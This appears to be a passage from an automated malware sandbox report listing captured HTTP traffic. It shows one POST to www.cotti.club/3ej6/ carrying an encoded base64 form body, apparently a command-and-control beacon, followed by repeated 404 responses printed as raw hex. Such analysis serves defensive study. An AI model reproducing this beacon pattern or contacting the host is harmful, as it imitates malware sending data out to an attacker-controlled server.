Source: unknown HTTP traffic detected: POST /3ej6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.cotti.clubCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeOrigin: http://www.cotti.clubReferer: http://www.cotti.club/3ej6/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like GeckoData Raw: 5a 54 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d Data Ascii: ZT=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:11:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5ZvPtRhUlbgd6ONKMjWbXaoAqljdmaPMTRB2s%2Fbi6WcDYYUN3nlC4cIdH4rcemOlzry82ceMTb6WE5krFVDHX6rp3XZhsByGm5EY7rJjdi59eMOQ8%2BSwMXmFDkScXu9uA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da998248a306b05-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5aMnOrTDMLSCD9d3MNs5NP5MCIfiHRg%2FMrugTcVU3tK8Dxn28uRBzqqmnq4v9gRwb8qMCygHf%2BrOriebiqqnMTUbsJ9CD4YYQLhaxYhdUaSBSqIizJPZWpRg%2BmT7JTsgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da9983488fc4689-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIep7RoKluhaXx9zrtMoL1J8SZJi0wHdCaYMe2LCN5%2FfySoQnREHGHdGqG9AZMv9Z2IBmhm3zDIRqIVeAVIF6%2Fqh3pzvb8WX4viL6YIO0acjihyFtOdJ08Iyr8elpocQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da9984479884784-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1932&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xinIiWNRIcHwM5X8ZP5mjpq%2BfM1UOr8lkUaDr6egOXumJ72RaajFtJcZbT5MNV7e7IpoWi1SixLr9K5fdes9AIZucXajbfrI1Cg%2B5kmWwfisbIVDwpxydofQgskZL9XrYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da99854ddcd3ab5-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 